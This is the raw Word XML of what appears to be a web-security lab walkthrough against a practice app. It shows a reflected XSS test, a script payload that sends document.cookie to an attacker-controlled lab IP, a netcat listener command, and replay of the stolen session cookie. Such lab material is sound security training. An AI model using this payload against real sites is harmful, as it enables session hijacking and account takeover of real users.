    <w:p w14:paraId="6D958BB4" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7511FD2C" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="4EA26C15" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="0B58D8C7" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="72159A6A" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="2ABD31B9" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="489026F4" w14:textId="77777777" w:rsidR="0041690A" w:rsidRDefault="0041690A" w:rsidP="00634134"/>
    <w:p w14:paraId="1D1D571A" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="09A34AB4" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:lastRenderedPageBreak/>
        <w:t>Testing for XSS, using the below payload. A popup appears which suggests XSS confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58758F17" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>Goto OWASP Top 10 -&gt; Cross Site Scripting (XSS) -&gt; Reflected -&gt; DNS Lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF4BEF" w14:textId="359D7BF6" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D10DCDA" w14:textId="75A96754" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="001E3415" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="615B420A" wp14:editId="7EEDEEFB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>153394</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4974077" cy="2255023"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="12065"/>
            <wp:wrapNone/>
            <wp:docPr id="32244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49775" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4974077" cy="2255023"/>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AF5668C" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="536BCA0C" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6933093F" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="65F69C63" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="40DA6E63" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="16C99F70" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4FF64C80" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="36E1A8E9" w14:textId="03FC9163" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0A19C764" w14:textId="4ECF06AB" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1A030B84" w14:textId="320F944E" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="01DD85AC" w14:textId="0A5B1669" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2A5DCC3C" w14:textId="1A66793C" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="6B70EED7" w14:textId="6845BC00" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="001E3415" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="215BDE91" wp14:editId="7DEF9381">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>182190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4993005" cy="3750310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="206626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60434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4993005" cy="3750310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6687A52A" w14:textId="04B71FA3" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7CD82E38" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0C72251D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="12068C4D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="20411362" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7B914CEC" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1040EE07" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="670FC872" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="3408C16B" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="0ECDF7F2" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="3C394E9E" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="2AC01871" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="26F72DA5" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="31D4D301" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="06E567A4" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="1E2A6D55" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="110B1F5A" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="0FC26BBF" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="5877C32A" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="2756D330" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="4F6DDF18" w14:textId="77777777" w:rsidR="00426E58" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="3C030B3A" w14:textId="77777777" w:rsidR="00426E58" w:rsidRPr="00523986" w:rsidRDefault="00426E58" w:rsidP="00634134"/>
    <w:p w14:paraId="25F8326D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="3DB335B2" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1F1FCD0D" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="220A27F8" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7AAC0A11" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="350B1820" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:lastRenderedPageBreak/>
        <w:t>Use XSS to steal session cookie. This is by injecting the below payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A95779" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>="http://192.168.1.35:8080/cookie.php?c="+document.cookie; &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8D7A3F" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A97B30D" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:t>On Kali Machine start a listener. When a victim loads the page, their session cookie will be sent to Kali (192.168.1.35). This is by entering the below command in Kali Machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCF6B4" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64513054" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CD560F7" wp14:editId="1F7D2564">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1940118" cy="765226"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="20762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2964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1940118" cy="765226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B7F7A9" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A4CC83" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A468751" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC22470" w14:textId="4A0811ED" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FCB9BF" w14:textId="7EEFF6F1" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="0020061E" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CCFCEB9" wp14:editId="56E17A2E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>28188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3304275" cy="2759103"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="22225"/>
            <wp:wrapNone/>
            <wp:docPr id="175693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37977" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3304275" cy="2759103"/>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26EC527" w14:textId="14A0FBFE" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8E512B" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="24CCBCF5" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="5D79D0C7" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="254B50F7" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="556DD212" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="7120DB2C" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="148510A3" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4FDBF530" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="445A0037" w14:textId="102B46A1" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4BC70649" w14:textId="774C28EA" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="2D49033A" w14:textId="4169D190" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="650D8057" w14:textId="40C74A19" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="52017341" w14:textId="14D57042" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="1CAF62CD" w14:textId="34FBB044" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0F6E1251" w14:textId="2B4F5DE1" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="0020061E" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6997F1A5" wp14:editId="1ED1557C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4832</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5255812" cy="2234178"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="87385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58872" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5255812" cy="2234178"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1579D" w14:textId="682695D8" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="587D7622" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="4312CC35" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="485D3B86" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="071327A0" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="358BCB83" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="7C82A2FE" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="21F52A8E" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="0251732B" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="08ED31CE" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="1EB9447F" w14:textId="77777777" w:rsidR="00FA19AA" w:rsidRPr="00523986" w:rsidRDefault="00FA19AA" w:rsidP="00634134"/>
    <w:p w14:paraId="704ADFA0" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0371E2CF" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="4316BF0B" w14:textId="743A7ABC" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00523986">
        <w:lastRenderedPageBreak/>
        <w:t>Replace session cookie with stolen value. You now have authenticated access to the web app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABEA67" w14:textId="028378CF" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00D75637" w:rsidP="00634134">
      <w:r w:rsidRPr="00523986">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="709741EB" wp14:editId="6AB75ABA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>34566</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5748793" cy="1741835"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="78838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81413" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5748793" cy="1741835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="104C505B" w14:textId="46F04760" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="5AB36BDA" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="303D7E43" w14:textId="77777777" w:rsidR="00634134" w:rsidRPr="00523986" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="422191AD" w14:textId="77777777" w:rsidR="00634134" w:rsidRDefault="00634134" w:rsidP="00634134"/>
    <w:p w14:paraId="0D20CEF1" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="75C6D0C5" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
    <w:p w14:paraId="38352D36" w14:textId="77777777" w:rsidR="00A87FAB" w:rsidRDefault="00A87FAB" w:rsidP="00634134"/>
